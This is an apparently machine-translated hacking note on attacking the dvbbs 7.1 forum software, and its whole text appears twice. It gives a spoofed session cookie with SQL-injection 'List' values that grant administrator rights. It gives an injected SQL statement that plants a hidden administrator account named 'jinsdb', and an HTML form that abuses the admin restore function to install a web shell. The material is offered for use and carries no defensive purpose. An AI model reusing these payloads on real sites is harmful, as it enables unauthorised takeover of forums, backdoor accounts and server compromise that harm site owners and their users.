dvbbs 7.1 skip the dead loop. The method of linzi can only have one management permission, but it is just the level of the novice who goes on the road.
If it is the SQL version, it is not easy to brute the library. In fact, it seems that you only need to crawl SESSION and do not log in to any user.
Don't turn off the fake death ie when cheating
This is the SESSION of the dead loop:
ASPSESSIONIDQCTRTQAC=HOPNBJLCKHGDDPNAAIOCKGCJ
Join or replace to the cookie bar of a browser that can be spoofed.
List=list5+and+1%3D2=1&list5+and+1%3D1=1&list1+and+1%3D2=1&list1+and+1%3D1=1&list3+and+1%3D2=1&list3+and+1%3D1=1; ASPSESSIONIDQCTRTQAC=HOPNBJLCKHGDDPNAAIOCKGCJ
Then click on any section
You will find that the users and levels you deceived are administrators.
Backend administrators can join through user rewards.
test','127.0.0.1',5) ;insert into dv_admin (username,[password],flag,adduser) values ('jinsdb','4ac646c9e65a1769','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37','jinsdb');--
dvbbs7.1 sql backend shell
<form action="http://127.0.0.1/bbs/admin/?act...t=Restore" method="post">
<p>The location of the uploaded file: <input name="Dbpath" type="text" size="80"></p>
<p>The location to be copied to: <input name="backpath" type="text" size="80"></p>
<p><input type="submit" value="submit"></p>
</form>
It seems that the usercookies of 7.1 are just a cover
No need at all
It can be used if removed.
funny
If it is the SQL version, it is not easy to brute the library. In fact, it seems that you only need to crawl SESSION and do not log in to any user.
Don't turn off the fake death ie when cheating
This is the SESSION of the dead loop:
ASPSESSIONIDQCTRTQAC=HOPNBJLCKHGDDPNAAIOCKGCJ
Join or replace to the cookie bar of a browser that can be spoofed.
List=list5+and+1%3D2=1&list5+and+1%3D1=1&list1+and+1%3D2=1&list1+and+1%3D1=1&list3+and+1%3D2=1&list3+and+1%3D1=1; ASPSESSIONIDQCTRTQAC=HOPNBJLCKHGDDPNAAIOCKGCJ
Then click on any section
You will find that the users and levels you deceived are administrators.
Backend administrators can join through user rewards.
test','127.0.0.1',5) ;insert into dv_admin (username,[password],flag,adduser) values ('jinsdb','4ac646c9e65a1769','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37','jinsdb');--
dvbbs7.1 sql backend shell
<form action="http://127.0.0.1/bbs/admin/?act...t=Restore" method="post">
<p>The location of the uploaded file: <input name="Dbpath" type="text" size="80"></p>
<p>The location to be copied to: <input name="backpath" type="text" size="80"></p>
<p><input type="submit" value="submit"></p>
</form>
It seems that the usercookies of 7.1 are just a cover
No need at all
It can be used if removed.
funny